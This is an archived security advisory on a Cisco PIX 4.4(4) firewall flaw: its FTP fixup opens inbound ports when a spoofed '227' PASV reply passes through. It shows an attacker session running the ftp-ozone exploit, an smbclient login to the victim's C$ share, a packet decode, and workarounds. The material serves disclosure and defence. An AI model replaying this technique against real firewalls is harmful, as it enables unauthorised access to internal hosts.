COMMAND
PIX
SYSTEMS AFFECTED
Cisco
PROBLEM
Eric Monti confirmed and did some more research regarding the PIX
hole mentioned by Jacek Lipkowski on bugtraq entitled. It's
available at:
http://oliver.efri.hr/~crv/security/bugs/Others/fw-13.html
Eric was able to verify that PIX is vulnerable to the FTP-Pasv
vulnerability that has been discussed on the Bugtraq mailing list
as of late. Here are his notes and findings.
In a nutshell the PIX can be fooled into opening up ports for
inbound connections to a DMZ FTP server if the FTP server can be
fooled into sending back what looks like a valid "227
(xxx,xxx,xxx,xx,prt,prt) response. The problem on the PIX is that
the 'fixup protocol ftp' component does not provide sufficient
enough checks to verify PASV connections before creating a
dynamic hole through the firewall. Note that there are several
ways to get the FTP server to generate the message that will
trigger PIX's insecure behaviour. The exploit used for testing
was Dug Song's ftp-ozone.c (available at link above).
The PIX tested is running the 4.4(4) version of software. Other
versions have not been tested but are most likelly vulnerable.
Here is the session from the attacker. "ftp-ozone" is the public
exploit from Dug Song. Eric made a few minor 'asthetic'
adjustments and added support for anonymous login with '-l'
(although it wasnt used in this example). The source code is
below.
--------------Exploit Launched-----------------
[root@ix ftp-atk]# ./ftp-ozone 10.1.2.3 139
220 victim Microsoft FTP Service (Version 4.0).
Garbage packet contains:
500 '...........................................................................................................................
Money packet contains:
227 (10,1,2,3,0,139)': command not understood
-------------Opened port connected (NBT)-------
[root@ix ftp-atk]# smbclient \\\\VICTIM\\c$ -I 10.1.2.3 -U administrator
Added interface ip=127.0.0.1 bcast=127.255.255.255 nmask=255.0.0.0
Password: ********
Domain=[VICTIM] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]
smb: \> dir
AUTOEXEC.BAT A 0 Mon Mar 13 03:22:58 2000
boot.ini ASR 279 Mon Mar 13 03:15:07 2000
CONFIG.SYS A 0 Mon Mar 13 03:22:58 2000
IO.SYS AHSR 0 Mon Mar 13 03:22:58 2000
MSDOS.SYS AHSR 0 Mon Mar 13 03:22:58 2000
MSSCE D 0 Tue Mar 7 14:29:57 2000
NTDETECT.COM AHSR 26816 Tue Mar 7 11:47:49 2000
ntldr AHSR 156496 Tue Mar 7 11:47:49 2000
pagefile.sys A1073741824 Tue Mar 7 11:51:51 2000
Program Files D 0 Tue Mar 7 11:35:11 2000
RECYCLER DHS 0 Mon Mar 13 09:35:51 2000
TEMP DA 0 Tue Mar 7 14:36:31 2000
WINNT D 0 Tue Mar 7 14:30:05 2000
64706 blocks of size 65536. 43841 blocks available
smb: \> quit
As you can see above; after the manipulated packet generated from
the FTP server by ftp-ozone is returned, we are able to connect
to the NBT(tcp/139) service and access a share. On the PIX with
'logging console debug' set, this was all that showed up:
302001: Built inbound TCP connection 202 for faddr 10.1.2.4/1139
gaddr 10.1.2.3/21 laddr 192.168.205.2/21
Below is a packet decode generated from tcpdump -w. The IP's used
are as follows: attacker=10.1.2.4, victim-nat=10.1.2.3,
victim-real=192.168.205.2(doesnt appear in decode)
The PIX sits between 10.1.2.4 and 192.168.2.2 (obviously).
In Packet #11 of the decode, in the TCP data segment, you can see
what is triggering the PIX's insecure behavior: "227
(10,1,2,3,0,139)': command not understood."
This confirms what was assumed; that the only check that the PIX
makes before creating a dynamic PASV conduit is whether the "227
(xxx,xxx,xxx,xxx,prt,prt)" appears at the beginning of the packet.
Here's the decode package:
Packet 1
Timestamp: 15:02:37.130283
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 60 bytes
Identification: 0x04CF
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D4C
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403974
Acknowledgement Number: 0000000000
Header Length: 40 bytes (data=0)
Flags: URG=off, ACK=off, PSH=off
RST=off, SYN=on, FIN=off
Window Advertisement: 128 bytes
Checksum: 0x78CB
Urgent Pointer: 0
<Options not displayed>
TCP Data
<No data>
-----------------------------------------------------------------
Packet 2
Timestamp: 15:02:37.130720
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 44 bytes
Identification: 0x4311
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9F19
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576390
Acknowledgement Number: 1818403975
Header Length: 24 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=on, FIN=off
Window Advertisement: 8760 bytes
Checksum: 0x8CFE
Urgent Pointer: 0
<Options not displayed>
TCP Data
<No data>
-----------------------------------------------------------------
Packet 3
Timestamp: 15:02:37.130765
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D0
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5F
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403975
Acknowledgement Number: 1212576391
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0xC673
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 4
Timestamp: 15:02:37.131178
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 88 bytes
Identification: 0x4411
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9DED
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576391
Acknowledgement Number: 1818403975
Header Length: 20 bytes (data=48)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 8760 bytes
Checksum: 0x0458
Urgent Pointer: 0
TCP Data
220 wapp2 Microsoft FTP Service (Version 4.0)..
-----------------------------------------------------------------
Packet 5
Timestamp: 15:02:37.131204
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D1
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5E
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403975
Acknowledgement Number: 1212576439
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 80 bytes
Checksum: 0xC673
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 6
Timestamp: 15:02:47.126818
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 163 bytes
Identification: 0x04D2
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1CE2
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403975
Acknowledgement Number: 1212576439
Header Length: 20 bytes (data=123)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0x96BF
Urgent Pointer: 0
TCP Data
...........................................................................................................................
-----------------------------------------------------------------
Packet 7
Timestamp: 15:02:47.248131
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x4511
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9D1D
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576439
Acknowledgement Number: 1818404098
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 8637 bytes
Checksum: 0xA48B
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 8
Timestamp: 15:02:47.248184
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 69 bytes
Identification: 0x04D3
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D3F
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818404098
Acknowledgement Number: 1212576439
Header Length: 20 bytes (data=29)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0x2602
Urgent Pointer: 0
TCP Data
227 (10,1,2,3,0,139).
-----------------------------------------------------------------
Packet 9
Timestamp: 15:02:47.248558
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 168 bytes
Identification: 0x4611
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9B9D
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576439
Acknowledgement Number: 1818404127
Header Length: 20 bytes (data=128)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 8608 bytes
Checksum: 0x168C
Urgent Pointer: 0
TCP Data
500 '...........................................................................................................................
-----------------------------------------------------------------
Packet 10
Timestamp: 15:02:47.248599
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D4
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5B
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818404127
Acknowledgement Number: 1212576567
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0xC52B
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 11
Timestamp: 15:02:47.248836
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 94 bytes
Identification: 0x4711
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9AE7
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576567
Acknowledgement Number: 1818404127
Header Length: 20 bytes (data=54)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 8608 bytes
Checksum: 0x1DD1
Urgent Pointer: 0
TCP Data
227 (10,1,2,3,0,139)': command not understood.
-----------------------------------------------------------------
Packet 12
Timestamp: 15:02:47.266742
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D5
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5A
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818404127
Acknowledgement Number: 1212576621
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0xC4F5
Urgent Pointer: 0
TCP Data
<No data>
SOLUTION
Essentially this is the same as the more widely publicized
Firewall-1 incarnation of the hole (without their patch), only
there are a few major differences to note:
1. The port opened will allow bi-directional traffic
(confirmed in PIX 4.4(4), probably others as well).
2. *ANY* port can be opened, even low-numbered and well-known
ports. This could be worked around with a conduit ACL
using explicit denies on the external interface.
3. The 'fixup protocol ftp' is what appears to be the core of
this problem on the PIX side of it. If it is disabled the
exploit (in any version) will not work. This is what
handles PASV FTP on the PIX. If you disable it though,
there are two things to note:
- Outbound ftp connections from the inside *have* be made
with PASV ftp clients.
- Inbound ftp connections from the outside world cannot use
PASV.
There may be other workarounds than those cited above.